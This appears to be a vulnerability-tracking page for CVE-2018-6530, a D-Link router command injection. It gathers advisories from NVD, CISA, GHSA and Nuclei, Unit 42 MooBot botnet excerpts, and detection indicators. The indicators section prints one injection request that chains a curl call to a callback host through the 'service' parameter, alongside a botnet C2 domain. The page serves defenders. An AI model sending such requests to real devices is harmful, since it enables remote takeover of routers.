CVE-2018-6530
published 2018-03-06CVE-2018-6530: OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L…
PriorityP198critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomware
CISA Known Exploited Vulnerabilitydue 2022-09-29
Exploited in the wild
EPSS
96.68%
99.9th percentile
OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dlink | dir-818lw_firmware | — | — |
| dlink | dir-860l_firmware | <= 1.10b04 | — |
| dlink | dir-860l_firmware | — | — |
| dlink | dir-865l_firmware | <= 1.08b01 | — |
| dlink | dir-868l_firmware | <= 1.12b04 | — |
| dlink | dir-880l_firmware | <= 1.08b04 | — |
Detection & IOCsextracted from sources · hover to see the quote
path/soap.cgi
commandPOST /soap.cgi?service=whatever-control;curl {{interactsh-url}};whatever-invalid-shell HTTP/1.1
- →Palo Alto Networks Threat Prevention signatures 38600, 92960, 92959 and 92533 cover the exploit traffic for this campaign ↗
- →MooBot processes print 'get haxored!' to console on execution, spawn processes with random names, and wipe the executable — monitor for self-deleting binaries and random-named child processes on IoT/Linux devices ↗
- →MooBot C2 communications begin with magic bytes 0x336699; network detection rules should look for this signature in outbound TCP streams from IoT devices ↗
- →Exploit HTTP request uses SOAPAction header with arbitrary serviceType#action value; detection should flag POST requests to /soap.cgi containing shell metacharacters (semicolons) in the 'service' query parameter
- →Compromised devices renamed downloaded MooBot binaries to 'Realtek' or 'Android'; hunt for these process/file names on Linux-based network devices ↗
- ·The MooBot C2 server was offline at time of analysis; the domain vpn.komaru[.]today may no longer be active but should still be blocked/monitored ↗
- ·CISA notes that CVE-2018-20114 is the patch that properly addresses this KEV entry (CVE-2018-6530); defenders should verify which CVE their firmware patch actually covers ↗
- ·End-of-life devices cannot be patched and should be disconnected; patching guidance only applies to still-supported models ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-j95f-33m4-87jf: OS command injection vulnerability in soap
ghsa_unreviewed·2022-05-24
CVE-2018-6530 [CRITICAL] CWE-78 GHSA-j95f-33m4-87jf: OS command injection vulnerability in soap
OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.
GHSA
GHSA-xjxf-w237-rjjp: On D-Link DIR-818LW Rev
ghsa_unreviewed·2022-05-13·CVSS 9.8
CVE-2018-20114 [CRITICAL] CWE-78 GHSA-xjxf-w237-rjjp: On D-Link DIR-818LW Rev
On D-Link DIR-818LW Rev.A 2.05.B03 and DIR-860L Rev.B 2.03.B03 devices, unauthenticated remote OS command execution can occur in the soap.cgi service of the cgibin binary via an "&&" substring in the service parameter. NOTE: this issue exists because of an incomplete fix for CVE-2018-6530.
VulnCheck
D-Link Multiple Routers OS Command Injection Vulnerability
vulncheck·2018·CVSS 9.8
CVE-2018-6530 [CRITICAL] CWE-78 D-Link Multiple Routers OS Command Injection Vulnerability
D-Link Multiple Routers OS Command Injection Vulnerability
Multiple D-Link routers contain an unspecified vulnerability that allows for execution of OS commands.
Affected: D-Link Multiple Routers
Required Action: The vendor D-Link published an advisory stating the fix under CVE-2018-20114 properly patches KEV entry CVE-2018-6530. If the device is still supported, apply updates per vendor instructions. If the affected device has since entered its end-of-life, it should be disconnected if still in use.
Known Ransomware Campaign Use: Known
Exploitation References: https://unit42.paloaltonetworks.com/moobot-d-link-devices/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.forescout.com/blog/doj-moobot-botnet-commandeered-by-russian-apt28-ana
CISA
D-Link Multiple Routers OS Command Injection Vulnerability
cisa·2022-09-08·CVSS 9.8
CVE-2018-6530 [CRITICAL] CWE-78 D-Link Multiple Routers OS Command Injection Vulnerability
Vulnerability: D-Link Multiple Routers OS Command Injection Vulnerability
Affected: D-Link Multiple Routers
Multiple D-Link routers contain an unspecified vulnerability that allows for execution of OS commands.
Required Action: The vendor D-Link published an advisory stating the fix under CVE-2018-20114 properly patches KEV entry CVE-2018-6530. If the device is still supported, apply updates per vendor instructions. If the affected device has since entered its end-of-life, it should be disconnected if still in use.
Notes: https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10105; https://nvd.nist.gov/vuln/detail/CVE-2018-6530
Remediation Due Date: 2022-09-29
No detection rules found.
Nuclei
D-Link - Unauthenticated Remote Code Execution
nuclei·CVSS 9.8
CVE-2018-6530 [CRITICAL] D-Link - Unauthenticated Remote Code Execution
D-Link - Unauthenticated Remote Code Execution
OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.
Template:
id: CVE-2018-6530
info:
name: D-Link - Unauthenticated Remote Code Execution
author: gy741
severity: critical
description: |
OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR
Unit42
Mirai Variant MooBot Targeting D-Link Devices
blogs_unit42·2022-09-06·CVSS 9.8
CVE-2015-2051 [CRITICAL] Mirai Variant MooBot Targeting D-Link Devices
## Executive Summary
In early August, Unit 42 researchers discovered attacks leveraging several vulnerabilities in devices made by D-Link, a company that specializes in network and connectivity products. The vulnerabilities exploited include:
- CVE-2015-2051: D-Link HNAP SOAPAction Header Command Execution Vulnerability
- CVE-2018-6530: D-Link SOAP Interface Remote Code Execution Vulnerability
- CVE-2022-26258: D-Link Remote Command Execution Vulnerability
- CVE-2022-28958: D-Link Remote Command Execution Vulnerability
If the devices are compromised, they will be fully controlled by attackers, who could utilize those devices to conduct further attacks such as distributed denial-of-service (DDoS) attacks. The exploit attempts captured by Unit 42 researchers leverage the aforementioned vu
Unit42
Mirai Variant MooBot Targeting D-Link Devices
blogs_unit42·2022-09-06·CVSS 9.8
CVE-2015-2051 [CRITICAL] Mirai Variant MooBot Targeting D-Link Devices
Threat Research Center
Threat Research
Vulnerabilities
## Mirai Variant MooBot Targeting D-Link Devices
Chao Lei
Zhibin Zhang
Cecilia Hu
Aveek Das
Published: September 6, 2022
Malware
Threat Research
Vulnerabilities
CVE-2015-2051
CVE-2018-6530
CVE-2022-26258
CVE-2022-28958
IoT
Mirai
MooBot
SOHO
## Executive Summary
In early August, Unit 42 researchers discovered attacks leveraging several vulnerabilities in devices made by D-Link, a company that specializes in network and connectivity products. The vulnerabilities exploited include:
CVE-2015-2051 : D-Link HNAP SOAPAction Header Command Execution Vulnerability
CVE-2018-6530 : D-Link SOAP Interface Remote Code Execution Vulnerability
CVE-2022-26258 : D-Link Remote Command Execution Vulnerability
CVE-2022-28958 :
Greynoiseio
NoiseLetter September 2024
blogs_greynoiseio
NoiseLetter September 2024
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdfftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdfftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_NOTES_1.10B01_EN_WW.pdfftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-880L/REVA/DIR-880L_REVA_FIRMWARE_PATCH_NOTES_1.08B06_EN_WW.pdfhttps://github.com/TheBeeMan/Pwning-multiple-dlink-router-via-SOAP-protoftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-860L/REVA/DIR-860L_REVA_FIRMWARE_PATCH_NOTES_1.11B01_EN_WW.pdfftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-868L/REVA/DIR-868L_REVA_FIRMWARE_PATCH_NOTES_1.20B01_EN_WW.pdfftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-865L/REVA/DIR-865L_REVA_FIRMWARE_PATCH_NOTES_1.10B01_EN_WW.pdfftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-880L/REVA/DIR-880L_REVA_FIRMWARE_PATCH_NOTES_1.08B06_EN_WW.pdfhttps://github.com/TheBeeMan/Pwning-multiple-dlink-router-via-SOAP-protohttps://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2018-6530
2018-03-06
Published
2022-09-08
Added to CISA KEV
Exploited in the wild